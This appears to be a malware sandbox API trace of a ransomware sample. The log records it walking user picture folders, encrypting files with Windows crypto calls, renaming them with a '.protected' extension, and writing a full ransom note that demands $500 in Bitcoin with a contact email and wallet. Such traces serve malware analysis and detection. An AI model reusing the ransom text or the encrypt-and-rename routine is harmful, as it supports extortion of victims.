0x0 [0092.488] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.489] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.489] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.489] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.489] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.501] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.502] CloseHandle (hObject=0x14c) returned 1 [0092.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg.protected") returned 107 [0092.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o 
s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg.protected")) returned 1 [0092.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.503] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\RESTORE_FILES.txt") returned 99 [0092.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.504] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.504] lstrlenA (lpString="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") returned 684 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.504] CloseHandle (hObject=0xd8) returned 1 [0092.505] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Windows") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Program Files") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Program Files (x86)") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="$Recycle.bin") returned 1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="System Volume Information") returned -1 [0092.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrIW (lpFirst="EZfBK.gif", lpSrch=".protected") returned 0x0 [0092.505] lstrcmpW (lpString1="EZfBK.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".txt") returned 0x0 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") 
returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".rar") returned 0x0 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".zip") returned 0x0 [0092.505] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.506] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.506] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.506] CloseHandle (hObject=0xd8) returned 1 [0092.506] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif.protected") returned 87 [0092.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o 
s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif.protected")) returned 1 [0092.507] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Windows") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Program Files") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Program Files (x86)") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="$Recycle.bin") returned 1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="System Volume Information") returned -1 [0092.507] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur") returned 80 [0092.507] lstrcmpW (lpString1="gS6abvkesfur", lpString2=".") returned 1 [0092.507] lstrcmpW (lpString1="gS6abvkesfur", lpString2="..") returned 1 [0092.507] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\*") returned 82 [0092.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.508] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW 
(in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\.") returned 82 [0092.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.508] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\..") returned 83 [0092.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.508] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.508] StrStrIW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".protected") returned 0x0 [0092.508] lstrcmpW 
(lpString1="cc1qgVTc4zzow.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".txt") returned 0x0 [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".rar") returned 0x0 [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".zip") returned 0x0 [0092.509] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.510] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.510] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.511] CloseHandle (hObject=0x14c) returned 1 [0092.511] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg.protected") returned 108 [0092.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg.protected")) returned 1 [0092.512] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Windows") returned -1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Program Files") returned -1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="Program Files (x86)") returned -1 [0092.512] lstrcmpiW 
(lpString1="eK9PJsIpWbUd.bmp", lpString2="$Recycle.bin") returned 1 [0092.512] lstrcmpiW (lpString1="eK9PJsIpWbUd.bmp", lpString2="System Volume Information") returned -1 [0092.512] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.512] StrStrIW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".protected") returned 0x0 [0092.512] lstrcmpW (lpString1="eK9PJsIpWbUd.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.512] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.512] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".txt") returned 0x0 [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".rar") returned 0x0 [0092.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp") returned 97 [0092.513] StrStrW (lpFirst="eK9PJsIpWbUd.bmp", lpSrch=".zip") returned 0x0 [0092.513] 
ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.514] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.514] CloseHandle (hObject=0x14c) returned 1 [0092.514] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp.protected") returned 107 [0092.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\eK9PJsIpWbUd.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o 
s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ek9pjsipwbud.bmp.protected")) returned 1 [0092.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Windows") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Program Files") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="Program Files (x86)") returned -1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="$Recycle.bin") returned 1 [0092.515] lstrcmpiW (lpString1="LDad1G.jpg", lpString2="System Volume Information") returned -1 [0092.515] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.515] StrStrIW (lpFirst="LDad1G.jpg", lpSrch=".protected") returned 0x0 [0092.515] lstrcmpW (lpString1="LDad1G.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.516] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.516] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.516] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.516] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".txt") returned 0x0 [0092.516] lstrlenW 
